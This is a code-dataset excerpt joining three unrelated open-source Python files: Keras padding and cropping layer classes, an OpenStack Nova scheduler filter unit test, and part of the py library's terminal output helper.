dim3 = self.size[2] * input_shape[
4] if input_shape[4] is not None else None
return tensor_shape.TensorShape(
[input_shape[0], input_shape[1], dim1, dim2, dim3])
else:
dim1 = self.size[0] * input_shape[
1] if input_shape[1] is not None else None
dim2 = self.size[1] * input_shape[
2] if input_shape[2] is not None else None
dim3 = self.size[2] * input_shape[
3] if input_shape[3] is not None else None
return tensor_shape.TensorShape(
[input_shape[0], dim1, dim2, dim3, input_shape[4]])
def call(self, inputs):
return K.resize_volumes(inputs, self.size[0], self.size[1], self.size[2],
self.data_format)
def get_config(self):
config = {'size': self.size, 'data_format': self.data_format}
base_config = super(UpSampling3D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class ZeroPadding1D(Layer):
"""Zero-padding layer for 1D input (e.g. temporal sequence).
Arguments:
padding: int, or tuple of int (length 2), or dictionary.
- If int:
How many zeros to add at the beginning and end of
the padding dimension (axis 1).
- If tuple of int (length 2):
How many zeros to add at the beginning and at the end of
the padding dimension (`(left_pad, right_pad)`).
Input shape:
3D tensor with shape `(batch, axis_to_pad, features)`
Output shape:
3D tensor with shape `(batch, padded_axis, features)`
"""
def __init__(self, padding=1, **kwargs):
super(ZeroPadding1D, self).__init__(**kwargs)
self.padding = conv_utils.normalize_tuple(padding, 2, 'padding')
self.input_spec = InputSpec(ndim=3)
def compute_output_shape(self, input_shape):
if input_shape[1] is not None:
length = input_shape[1] + self.padding[0] + self.padding[1]
else:
length = None
return tensor_shape.TensorShape([input_shape[0], length, input_shape[2]])
def call(self, inputs):
return K.temporal_padding(inputs, padding=self.padding)
def get_config(self):
config = {'padding': self.padding}
base_config = super(ZeroPadding1D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class ZeroPadding2D(Layer):
"""Zero-padding layer for 2D input (e.g. picture).
This layer can add rows and columns of zeros
at the top, bottom, left and right side of an image tensor.
Arguments:
padding: int, or tuple of 2 ints, or tuple of 2 tuples of 2 ints.
- If int: the same symmetric padding
is applied to width and height.
- If tuple of 2 ints:
interpreted as two different
symmetric padding values for height and width:
`(symmetric_height_pad, symmetric_width_pad)`.
- If tuple of 2 tuples of 2 ints:
interpreted as
`((top_pad, bottom_pad), (left_pad, right_pad))`
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
Input shape:
4D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, rows, cols, channels)`
- If `data_format` is `"channels_first"`:
`(batch, channels, rows, cols)`
Output shape:
4D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, padded_rows, padded_cols, channels)`
- If `data_format` is `"channels_first"`:
`(batch, channels, padded_rows, padded_cols)`
"""
def __init__(self, padding=(1, 1), data_format=None, **kwargs):
super(ZeroPadding2D, self).__init__(**kwargs)
self.data_format = conv_utils.normalize_data_format(data_format)
if isinstance(padding, int):
self.padding = ((padding, padding), (padding, padding))
elif hasattr(padding, '__len__'):
if len(padding) != 2:
raise ValueError('`padding` should have two elements. '
'Found: ' + str(padding))
height_padding = conv_utils.normalize_tuple(padding[0], 2,
'1st entry of padding')
width_padding = conv_utils.normalize_tuple(padding[1], 2,
'2nd entry of padding')
self.padding = (height_padding, width_padding)
else:
raise ValueError('`padding` should be either an int, '
'a tuple of 2 ints '
'(symmetric_height_pad, symmetric_width_pad), '
'or a tuple of 2 tuples of 2 ints '
'((top_pad, bottom_pad), (left_pad, right_pad)). '
'Found: ' + str(padding))
self.input_spec = InputSpec(ndim=4)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
if self.data_format == 'channels_first':
if input_shape[2] is not None:
rows = input_shape[2] + self.padding[0][0] + self.padding[0][1]
else:
rows = None
if input_shape[3] is not None:
cols = input_shape[3] + self.padding[1][0] + self.padding[1][1]
else:
cols = None
return tensor_shape.TensorShape(
[input_shape[0], input_shape[1], rows, cols])
elif self.data_format == 'channels_last':
if input_shape[1] is not None:
rows = input_shape[1] + self.padding[0][0] + self.padding[0][1]
else:
rows = None
if input_shape[2] is not None:
cols = input_shape[2] + self.padding[1][0] + self.padding[1][1]
else:
cols = None
return tensor_shape.TensorShape(
[input_shape[0], rows, cols, input_shape[3]])
def call(self, inputs):
return K.spatial_2d_padding(
inputs, padding=self.padding, data_format=self.data_format)
def get_config(self):
config = {'padding': self.padding, 'data_format': self.data_format}
base_config = super(ZeroPadding2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class ZeroPadding3D(Layer):
"""Zero-padding layer for 3D data (spatial or spatio-temporal).
Arguments:
padding: int, or tuple of 2 ints, or tuple of 2 tuples of 2 ints.
- If int: the same symmetric padding
is applied to width and height.
- If tuple of 2 ints:
interpreted as two different
symmetric padding values for height and width:
`(symmetric_dim1_pad, symmetric_dim2_pad, symmetric_dim3_pad)`.
- If tuple of 2 tuples of 2 ints:
interpreted as
`((left_dim1_pad, right_dim1_pad), (left_dim2_pad,
right_dim2_pad), (left_dim3_pad, right_dim3_pad))`
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, spatial_dim1, spatial_dim2, spatial_dim3, channels)`
while `channels_first` corresponds to inputs with shape
`(batch, channels, spatial_dim1, spatial_dim2, spatial_dim3)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
Input shape:
5D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, first_axis_to_pad, second_axis_to_pad, third_axis_to_pad,
depth)`
- If `data_format` is `"channels_first"`:
`(batch, depth, first_axis_to_pad, second_axis_to_pad,
third_axis_to_pad)`
Output shape:
5D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, first_padded_axis, second_padded_axis, third_axis_to_pad,
depth)`
- If `data_format` is `"channels_first"`:
`(batch, depth, first_padded_axis, second_padded_axis,
third_axis_to_pad)`
"""
def __init__(self, padding=(1, 1, 1), data_format=None, **kwargs):
super(ZeroPadding3D, self).__init__(**kwargs)
self.data_format = conv_utils.normalize_data_format(data_format)
if isinstance(padding, int):
self.padding = ((padding, padding), (padding, padding), (padding,
padding))
elif hasattr(padding, '__len__'):
if len(padding) != 3:
raise ValueError('`padding` should have 3 elements. '
'Found: ' + str(padding))
dim1_padding = conv_utils.normalize_tuple(padding[0], 2,
'1st entry of padding')
dim2_padding = conv_utils.normalize_tuple(padding[1], 2,
'2nd entry of padding')
dim3_padding = conv_utils.normalize_tuple(padding[2], 2,
'3rd entry of padding')
self.padding = (dim1_padding, dim2_padding, dim3_padding)
else:
raise ValueError(
'`padding` should be either an int, '
'a tuple of 3 ints '
'(symmetric_dim1_pad, symmetric_dim2_pad, symmetric_dim3_pad), '
'or a tuple of 3 tuples of 2 ints '
'((left_dim1_pad, right_dim1_pad),'
' (left_dim2_pad, right_dim2_pad),'
' (left_dim3_pad, right_dim2_pad)). '
'Found: ' + str(padding))
self.input_spec = InputSpec(ndim=5)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
if self.data_format == 'channels_first':
if input_shape[2] is not None:
dim1 = input_shape[2] + 2 * self.padding[0][0]
else:
dim1 = None
if input_shape[3] is not None:
dim2 = input_shape[3] + 2 * self.padding[1][0]
else:
dim2 = None
if input_shape[4] is not None:
dim3 = input_shape[4] + 2 * self.padding[2][0]
else:
dim3 = None
return tensor_shape.TensorShape(
[input_shape[0], input_shape[1], dim1, dim2, dim3])
elif self.data_format == 'channels_last':
if input_shape[1] is not None:
dim1 = input_shape[1] + 2 * self.padding[0][1]
else:
dim1 = None
if input_shape[2] is not None:
dim2 = input_shape[2] + 2 * self.padding[1][1]
else:
dim2 = None
if input_shape[3] is not None:
dim3 = input_shape[3] + 2 * self.padding[2][1]
else:
dim3 = None
return tensor_shape.TensorShape(
[input_shape[0], dim1, dim2, dim3, input_shape[4]])
def call(self, inputs):
return K.spatial_3d_padding(
inputs, padding=self.padding, data_format=self.data_format)
def get_config(self):
config = {'padding': self.padding, 'data_format': self.data_format}
base_config = super(ZeroPadding3D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Cropping1D(Layer):
"""Cropping layer for 1D input (e.g. temporal sequence).
It crops along the time dimension (axis 1).
Arguments:
cropping: int or tuple of int (length 2)
How many units should be trimmed off at the beginning and end of
the cropping dimension (axis 1).
If a single int is provided,
the same value will be used for both.
Input shape:
3D tensor with shape `(batch, axis_to_crop, features)`
Output shape:
3D tensor with shape `(batch, cropped_axis, features)`
"""
def __init__(self, cropping=(1, 1), **kwargs):
super(Cropping1D, self).__init__(**kwargs)
self.cropping = conv_utils.normalize_tuple(cropping, 2, 'cropping')
self.input_spec = InputSpec(ndim=3)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
if input_shape[1] is not None:
length = input_shape[1] - self.cropping[0] - self.cropping[1]
else:
length = None
return tensor_shape.TensorShape([input_shape[0], length, input_shape[2]])
def call(self, inputs):
if self.cropping[1] == 0:
return inputs[:, self.cropping[0]:, :]
else:
return inputs[:, self.cropping[0]:-self.cropping[1], :]
def get_config(self):
config = {'cropping': self.cropping}
base_config = super(Cropping1D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Cropping2D(Layer):
"""Cropping layer for 2D input (e.g. picture).
It crops along spatial dimensions, i.e. width and height.
Arguments:
cropping: int, or tuple of 2 ints, or tuple of 2 tuples of 2 ints.
- If int: the same symmetric cropping
is applied to width and height.
- If tuple of 2 ints:
interpreted as two different
symmetric cropping values for height and width:
`(symmetric_height_crop, symmetric_width_crop)`.
- If tuple of 2 tuples of 2 ints:
interpreted as
`((top_crop, bottom_crop), (left_crop, right_crop))`
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
Input shape:
4D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, rows, cols, channels)`
- If `data_format` is `"channels_first"`:
`(batch, channels, rows, cols)`
Output shape:
4D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, cropped_rows, cropped_cols, channels)`
- If `data_format` is `"channels_first"`:
`(batch, channels, cropped_rows, cropped_cols)`
Examples:
```python
# Crop the input 2D images or feature maps
model = Sequential()
model.add(Cropping2D(cropping=((2, 2), (4, 4)),
input_shape=(28, 28, 3)))
# now model.output_shape == (None, 24, 20, 3)
model.add(Conv2D(64, (3, 3), padding='same))
model.add(Cropping2D(cropping=((2, 2), (2, 2))))
# now model.output_shape == (None, 20, 16. 64)
```
"""
def __init__(self, cropping=((0, 0), (0, 0)), data_format=None, **kwargs):
super(Cropping2D, self).__init__(**kwargs)
self.data_format = conv_utils.normalize_data_format(data_format)
if isinstance(cropping, int):
self.cropping = ((cropping, cropping), (cropping, cropping))
elif hasattr(cropping, '__len__'):
if len(cropping) != 2:
raise ValueError('`cropping` should have two elements. '
'Found: ' + str(cropping))
height_cropping = conv_utils.normalize_tuple(cropping[0], 2,
'1st entry of cropping')
width_cropping = conv_utils.normalize_tuple(cropping[1], 2,
'2nd entry of cropping')
self.cropping = (height_cropping, width_cropping)
else:
raise ValueError('`cropping` should be either an int, '
'a tuple of 2 ints '
'(symmetric_height_crop, symmetric_width_crop), '
'or a tuple of 2 tuples of 2 ints '
'((top_crop, bottom_crop), (left_crop, right_crop)). '
'Found: ' + str(cropping))
self.input_spec = InputSpec(ndim=4)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
# pylint: disable=invalid-unary-operand-type
if self.data_format == 'channels_first':
return tensor_shape.TensorShape([
input_shape[0], input_shape[1],
input_shape[2] - self.cropping[0][0] - self.cropping[0][1]
if input_shape[2] else None,
input_shape[3] - self.cropping[1][0] - self.cropping[1][1]
if input_shape[3] else None
])
else:
return tensor_shape.TensorShape([
input_shape[0],
input_shape[1] - self.cropping[0][0] - self.cropping[0][1]
if input_shape[1] else None,
input_shape[2] - self.cropping[1][0] - self.cropping[1][1]
if input_shape[2] else None, input_shape[3]
])
# pylint: enable=invalid-unary-operand-type
def call(self, inputs):
# pylint: disable=invalid-unary-operand-type
if self.data_format == 'channels_first':
if self.cropping[0][1] == self.cropping[1][1] == 0:
return inputs[:, :, self.cropping[0][0]:, self.cropping[1][0]:]
elif self.cropping[0][1] == 0:
return inputs[:, :, self.cropping[0][0]:, self.cropping[1][0]:
-self.cropping[1][1]]
elif self.cropping[1][1] == 0:
return inputs[:, :, self.cropping[0][0]:-self.cropping[0][1],
self.cropping[1][0]:]
return inputs[:, :, self.cropping[0][0]:-self.cropping[0][1],
self.cropping[1][0]:-self.cropping[1][1]]
else:
if self.cropping[0][1] == self.cropping[1][1] == 0:
return inputs[:, self.cropping[0][0]:, self.cropping[1][0]:, :]
elif self.cropping[0][1] == 0:
return inputs[:, self.cropping[0][0]:, self.cropping[1][0]:
-self.cropping[1][1], :]
elif self.cropping[1][1] == 0:
return inputs[:, self.cropping[0][0]:-self.cropping[0][1],
self.cropping[1][0]:, :]
return inputs[:, self.cropping[0][0]:-self.cropping[0][1], self.cropping[
1][0]:-self.cropping[1][1], :] # pylint: disable=invalid-unary-operand-type
# pylint: enable=invalid-unary-operand-type
def get_config(self):
config = {'cropping': self.cropping, 'data_format': self.data_format}
base_config = super(Cropping2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Cropping3D(Layer):
"""Cropping layer for 3D data (e.g.
spatial or spatio-temporal).
Arguments:
cropping: int, or tuple of 23ints, or tuple of 3 tuples of 2 ints.
- If int: the same symmetric cropping
is applied to depth, height, and width.
- If tuple of 3 ints:
interpreted as two different
symmetric cropping values for depth, height, and width:
`(symmetric_dim1_crop, symmetric_dim2_crop, symmetric_dim3_crop)`.
- If tuple of 3 tuples of 2 ints:
interpreted as
`((left_dim1_crop, right_dim1_crop), (left_dim2_crop,
right_dim2_crop), (left_dim3_crop, right_dim3_crop))`
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, spatial_dim1, spatial_dim2, spatial_dim3, channels)`
while `channels_first` corresponds to inputs with shape
`(batch, channels, spatial_dim1, spatial_dim2, spatial_dim3)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
Input shape:
5D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, first_axis_to_crop, second_axis_to_crop, third_axis_to_crop,
depth)`
- If `data_format` is `"channels_first"`:
`(batch, depth, first_axis_to_crop, second_axis_to_crop,
third_axis_to_crop)`
Output shape:
5D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, first_cropped_axis, second_cropped_axis, third_cropped_axis,
depth)`
- If `data_format` is `"channels_first"`:
`(batch, depth, first_cropped_axis, second_cropped_axis,
third_cropped_axis)`
"""
def __init__(self,
cropping=((1, 1), (1, 1), (1, 1)),
data_format=None,
**kwargs):
super(Cropping3D, self).__init__(**kwargs)
self.data_format = conv_utils.normalize_data_format(data_format)
if isinstance(cropping, int):
self.cropping = ((cropping, cropping), (cropping, cropping), (cropping,
cropping))
elif hasattr(cropping, '__len__'):
if len(cropping) != 3:
raise ValueError('`cropping` should have 3 elements. '
'Found: ' + str(cropping))
dim1_cropping = conv_utils.normalize_tuple(cropping[0], 2,
'1st entry of cropping')
dim2_cropping = conv_utils.normalize_tuple(cropping[1], 2,
'2nd entry of cropping')
dim3_cropping = conv_utils.normalize_tuple(cropping[2], 2,
'3rd entry of cropping')
self.cropping = (dim1_cropping, dim2_cropping, dim3_cropping)
else:
raise ValueError(
'`cropping` should be either an int, '
'a tuple of 3 ints '
'(symmetric_dim1_crop, symmetric_dim2_crop, symmetric_dim3_crop), '
'or a tuple of 3 tuples of 2 ints '
'((left_dim1_crop, right_dim1_crop),'
' (left_dim2_crop, right_dim2_crop),'
' (left_dim3_crop, right_dim2_crop)). '
'Found: ' + str(cropping))
self.input_spec = InputSpec(ndim=5)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
# pylint: disable=invalid-unary-operand-type
if self.data_format == 'channels_first':
if input_shape[2] is not None:
dim1 = input_shape[2] - self.cropping[0][0] - self.cropping[0][1]
else:
dim1 = None
if input_shape[3] is not None:
dim2 = input_shape[3] - self.cropping[1][0] - self.cropping[1][1]
else:
dim2 = None
if input_shape[4] is not None:
dim3 = input_shape[4] - self.cropping[2][0] - self.cropping[2][1]
else:
dim3 = None
return tensor_shape.TensorShape(
[input_shape[0], input_shape[1], dim1, dim2, dim3])
elif self.data_format == 'channels_last':
if input_shape[1] is not None:
dim1 = input_shape[1] - self.cropping[0][0] - self.cropping[0][1]
else:
dim1 = None
if input_shape[2] is not None:
dim2 = input_shape[2] - self.cropping[1][0] - self.cropping[1][1]
else:
dim2 = None
if input_shape[3] is not None:
dim3 = input_shape[3] - self.cropping[2][0] - self.cropping[2][1]
else:
dim3 = None
return tensor_shape.TensorShape(
[input_shape[0], dim1, dim2, dim3, input_shape[4]])
# pylint: enable=invalid-unary-operand-type
def call(self, inputs):
# pylint: disable=invalid-unary-operand-type
if self.data_format == 'channels_first':
if self.cropping[0][1] == self.cropping[1][1] == self.cropping[2][1] == 0:
return inputs[:, :, self.cropping[0][0]:, self.cropping[1][0]:,
self.cropping[2][0]:]
elif self.cropping[0][1] == self.cropping[1][1] == 0:
return inputs[:, :, self.cropping[0][0]:, self.cropping[1][0]:,
self.cropping[2][0]:-self.cropping[2][1]]
elif self.cropping[1][1] == self.cropping[2][1] == 0:
return inputs[:, :, self.cropping[0][0]:-self.cropping[0][1],
self.cropping[1][0]:, self.cropping[2][0]:]
elif self.cropping[0][1] == self.cropping[2][1] == 0:
return inputs[:, :, self.cropping[0][0]:, self.cropping[1][0]:
-self.cropping[1][1], self.cropping[2][0]:]
elif self.cropping[0][1] == 0:
return inputs[:, :, self.cropping[0][0]:, self.cropping[1][
0]:-self.cropping[1][1], self.cropping[2][0]:-self.cropping[2][1]]
elif self.cropping[1][1] == 0:
return inputs[:, :, self.cropping[0][0]:-self.cropping[0][1], self.
cropping[1][0]:, self.cropping[2][0]:-self.cropping[2][1]]
elif self.cropping[2][1] == 0:
return inputs[:, :, self.cropping[0][0]:-self.cropping[0][1], self.
cropping[1][0]:-self.cropping[1][1], self.cropping[2][0]:]
return inputs[:, :, self.cropping[0][0]:-self.cropping[0][1],
self.cropping[1][0]:-self.cropping[1][1], self.cropping[2][
0]:-self.cropping[2][1]]
else:
if self.cropping[0][1] == self.cropping[1][1] == self.cropping[2][1] == 0:
return inputs[:, self.cropping[0][0]:, self.cropping[1][0]:,
self.cropping[2][0]:, :]
elif self.cropping[0][1] == self.cropping[1][1] == 0:
return inputs[:, self.cropping[0][0]:, self.cropping[1][0]:,
self.cropping[2][0]:-self.cropping[2][1], :]
elif self.cropping[1][1] == self.cropping[2][1] == 0:
return inputs[:, self.cropping[0][0]:-self.cropping[0][1],
self.cropping[1][0]:, self.cropping[2][0]:, :]
elif self.cropping[0][1] == self.cropping[2][1] == 0:
return inputs[:, self.cropping[0][0]:, self.cropping[1][0]:
-self.cropping[1][1], self.cropping[2][0]:, :]
elif self.cropping[0][1] == 0:
return inputs[:, self.cropping[0][0]:, self.cropping[1][
0]:-self.cropping[1][1], self.cropping[2][0]:
-self.cropping[2][1], :]
elif self.cropping[1][1] == 0:
return inputs[:, self.cropping[0][
0]:-self.cropping[0][1], self.cropping[1][0]:, self.cropping[2][0]:
-self.cropping[2][1], :]
elif self.cropping[2][1] == 0:
return inputs[:, self.cropping[0][0]:-self.cropping[0][1],
self.cropping[1][0]:-self.cropping[1][1], self.cropping[
2][0]:, :]
return inputs[:, self.cropping[0][0]:-self.cropping[0][1], self.cropping[
1][0]:-self.cropping[1][1], self.cropping[2][0]: # pylint: disable=invalid-unary-operand-type
-self.cropping[2][1], :] # pylint: disable=invalid-unary-operand-type
# pylint: enable=invalid-unary-operand-type
def get_config(self):
config = {'cropping': self.cropping, 'data_format': self.data_format}
base_config = super(Cropping3D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
# Aliases
Convolution1D = Conv1D
Convolution2D = Conv2D
Convolution3D = Conv3D
SeparableConvolution2D = SeparableConv2D
Convolution2DTranspose = Conv2DTranspose
Convolution3DTranspose = Conv3DTranspose
Deconvolution2D = Deconv2D = Conv2DTranspose
Deconvolution3D = Deconv3D = Conv3DTranspose
| apache-2.0 |
JioCloud/nova_test_latest | nova/tests/unit/scheduler/filters/test_compute_filters.py | 68 | 2286 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova.scheduler.filters import compute_filter
from nova import test
from nova.tests.unit.scheduler import fakes
@mock.patch('nova.servicegroup.API.service_is_up')
class TestComputeFilter(test.NoDBTestCase):
def test_compute_filter_manual_disable(self, service_up_mock):
filt_cls = compute_filter.ComputeFilter()
filter_properties = {'instance_type': {'memory_mb': 1024}}
service = {'disabled': True}
host = fakes.FakeHostState('host1', 'node1',
{'free_ram_mb': 1024, 'service': service})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
self.assertFalse(service_up_mock.called)
def test_compute_filter_sgapi_passes(self, service_up_mock):
filt_cls = compute_filter.ComputeFilter()
filter_properties = {'instance_type': {'memory_mb': 1024}}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'node1',
{'free_ram_mb': 1024, 'service': service})
service_up_mock.return_value = True
self.assertTrue(filt_cls.host_passes(host, filter_properties))
service_up_mock.assert_called_once_with(service)
def test_compute_filter_sgapi_fails(self, service_up_mock):
filt_cls = compute_filter.ComputeFilter()
filter_properties = {'instance_type': {'memory_mb': 1024}}
service = {'disabled': False, 'updated_at': 'now'}
host = fakes.FakeHostState('host1', 'node1',
{'free_ram_mb': 1024, 'service': service})
service_up_mock.return_value = False
self.assertFalse(filt_cls.host_passes(host, filter_properties))
service_up_mock.assert_called_once_with(service)
| apache-2.0 |
sliz1/servo | tests/wpt/web-platform-tests/tools/py/py/_io/terminalwriter.py | 175 | 12542 | """
Helper functions for writing to terminals and files.
"""
import sys, os
import py
py3k = sys.version_info[0] >= 3
from py.builtin import text, bytes
win32_and_ctypes = False
colorama = None
if sys.platform == "win32":
try:
import colorama
except ImportError:
try:
import ctypes
win32_and_ctypes = True
except ImportError:
pass
def _getdimensions():
import termios,fcntl,struct
call = fcntl.ioctl(1,termios.TIOCGWINSZ,"\000"*8)
height,width = struct.unpack( "hhhh", call ) [:2]
return height, width
def get_terminal_width():
height = width = 0
try:
height, width = _getdimensions()
except py.builtin._sysex:
raise
except:
# pass to fallback below
pass
if width == 0:
# FALLBACK:
# * some exception happened
# * or this is emacs terminal which reports (0,0)
width = int(os.environ.get('COLUMNS', 80))
# XXX the windows getdimensions may be bogus, let's sanify a bit
if width < 40:
width = 80
return width
terminal_width = get_terminal_width()
# XXX unify with _escaped func below
def ansi_print(text, esc, file=None, newline=True, flush=False):
if file is None:
file = sys.stderr
text = text.rstrip()
if esc and not isinstance(esc, tuple):
esc = (esc,)
if esc and sys.platform != "win32" and file.isatty():
text = (''.join(['\x1b[%sm' % cod for cod in esc]) +
text +
'\x1b[0m') # ANSI color code "reset"
if newline:
text += '\n'
if esc and win32_and_ctypes and file.isatty():
if 1 in esc:
bold = True
esc = tuple([x for x in esc if x != 1])
else:
bold = False
esctable = {() : FOREGROUND_WHITE, # normal
(31,): FOREGROUND_RED, # red
(32,): FOREGROUND_GREEN, # green
(33,): FOREGROUND_GREEN|FOREGROUND_RED, # yellow
(34,): FOREGROUND_BLUE, # blue
(35,): FOREGROUND_BLUE|FOREGROUND_RED, # purple
(36,): FOREGROUND_BLUE|FOREGROUND_GREEN, # cyan
(37,): FOREGROUND_WHITE, # white
(39,): FOREGROUND_WHITE, # reset
}
attr = esctable.get(esc, FOREGROUND_WHITE)
if bold:
attr |= FOREGROUND_INTENSITY
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
if file is sys.stderr:
handle = GetStdHandle(STD_ERROR_HANDLE)
else:
handle = GetStdHandle(STD_OUTPUT_HANDLE)
oldcolors = GetConsoleInfo(handle).wAttributes
attr |= (oldcolors & 0x0f0)
SetConsoleTextAttribute(handle, attr)
while len(text) > 32768:
file.write(text[:32768])
text = text[32768:]
if text:
file.write(text)
SetConsoleTextAttribute(handle, oldcolors)
else:
file.write(text)
if flush:
file.flush()
def should_do_markup(file):
if os.environ.get('PY_COLORS') == '1':
return True
if os.environ.get('PY_COLORS') == '0':
return False
return hasattr(file, 'isatty') and file.isatty() \
and os.environ.get('TERM') != 'dumb' \
and not (sys.platform.startswith('java') and os._name == 'nt')
class TerminalWriter(object):
_esctable = dict(black=30, red=31, green=32, yellow=33,
blue=34, purple=35, cyan=36, white=37,
Black=40, Red=41, Green=42, Yellow=43,
Blue=44, Purple=45, Cyan=46, White=47,
bold=1, light=2, blink=5, invert=7)
# XXX deprecate stringio argument
def __init__(self, file=None, stringio=False, encoding=None):
if file is None:
if stringio:
self.stringio = file = py.io.TextIO()
else:
file = py.std.sys.stdout
elif py.builtin.callable(file) and not (
hasattr(file, "write") and hasattr(file, "flush")):
file = WriteFile(file, encoding=encoding)
if hasattr(file, "isatty") and file.isatty() and colorama:
file = colorama.AnsiToWin32(file).stream
self.encoding = encoding or getattr(file, 'encoding', "utf-8")
self._file = file
self.fullwidth = get_terminal_width()
self.hasmarkup = should_do_markup(file)
self._lastlen = 0
def _escaped(self, text, esc):
if esc and self.hasmarkup:
text = (''.join(['\x1b[%sm' % cod for cod in esc]) +
text +'\x1b[0m')
return text
def markup(self, text, **kw):
esc = []
for name in kw:
if name not in self._esctable:
raise ValueError("unknown markup: %r" %(name,))
if kw[name]:
esc.append(self._esctable[name])
return self._escaped(text, tuple(esc))
def sep(self, sepchar, title=None, fullwidth=None, **kw):
if fullwidth is None:
fullwidth = self.fullwidth
# the goal is to have the line be as long as possible
# under the condition that len(line) <= fullwidth
if sys.platform == "win32":
# if we print in the last column on windows we are on a
# new line but there is no way to verify/neutralize this
# (we may not know the exact line width)
# so let's be defensive to avoid empty lines in the output
fullwidth -= 1
if title is not None:
# we want 2 + 2*len(fill) + len(title) <= fullwidth
# i.e. 2 + 2*len(sepchar)*N + len(title) <= fullwidth
# 2*len(sepchar)*N <= fullwidth - len(title) - 2
# N <= (fullwidth - len(title) - 2) // (2*len(sepchar))
N = (fullwidth - len(title) - 2) // (2*len(sepchar))
fill = sepchar * N
line = "%s %s %s" % (fill, title, fill)
else:
# we want len(sepchar)*N <= fullwidth
# i.e. N <= fullwidth // len(sepchar)
line = sepchar * (fullwidth // len(sepchar))
# in some situations there is room for an extra sepchar at the right,
# in particular if we consider that with a sepchar like "_ " the
# trailing space is not important at the end of the line
if len(line) + len(sepchar.rstrip()) <= fullwidth:
line += sepchar.rstrip()
self.line(line, **kw)
def write(self, msg, **kw):
if msg:
if not isinstance(msg, (bytes, text)):
msg = text(msg)
if self.hasmarkup and kw:
markupmsg = self.markup(msg, **kw)
else:
markupmsg = msg
write_out(self._file, markupmsg)
def line(self, s='', **kw):
self.write(s, **kw)
self._checkfill(s)
self.write('\n')
def reline(self, line, **kw):
if not self.hasmarkup:
raise ValueError("cannot use rewrite-line without terminal")
self.write(line, **kw)
self._checkfill(line)
self.write('\r')
self._lastlen = len(line)
def _checkfill(self, line):
diff2last = self._lastlen - len(line)
if diff2last > 0:
self.write(" " * diff2last)
class Win32ConsoleWriter(TerminalWriter):
def write(self, msg, **kw):
if msg:
if not isinstance(msg, (bytes, text)):
msg = text(msg)
oldcolors = None
if self.hasmarkup and kw:
handle = GetStdHandle(STD_OUTPUT_HANDLE)
oldcolors = GetConsoleInfo(handle).wAttributes
default_bg = oldcolors & 0x00F0
attr = default_bg
if kw.pop('bold', False):
attr |= FOREGROUND_INTENSITY
if kw.pop('red', False):
attr |= FOREGROUND_RED
elif kw.pop('blue', False):
attr |= FOREGROUND_BLUE
elif kw.pop('green', False):
attr |= FOREGROUND_GREEN
elif kw.pop('yellow', False):
attr |= FOREGROUND_GREEN|FOREGROUND_RED
else:
attr |= oldcolors & 0x0007
SetConsoleTextAttribute(handle, attr)
write_out(self._file, msg)
if oldcolors:
SetConsoleTextAttribute(handle, oldcolors)
class WriteFile(object):
def __init__(self, writemethod, encoding=None):
self.encoding = encoding
self._writemethod = writemethod
def write(self, data):
if self.encoding:
data = data.encode(self.encoding, "replace")
self._writemethod(data)
def flush(self):
return
if win32_and_ctypes:
TerminalWriter = Win32ConsoleWriter
import ctypes
from ctypes import wintypes
# ctypes access to the Windows console
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
FOREGROUND_BLACK = 0x0000 # black text
FOREGROUND_BLUE = 0x0001 # text color contains blue.
FOREGROUND_GREEN = 0x0002 # text color contains green.
FOREGROUND_RED = 0x0004 # text color contains red.
FOREGROUND_WHITE = 0x0007
FOREGROUND_INTENSITY = 0x0008 # text color is intensified.
BACKGROUND_BLACK = 0x0000 # background color black
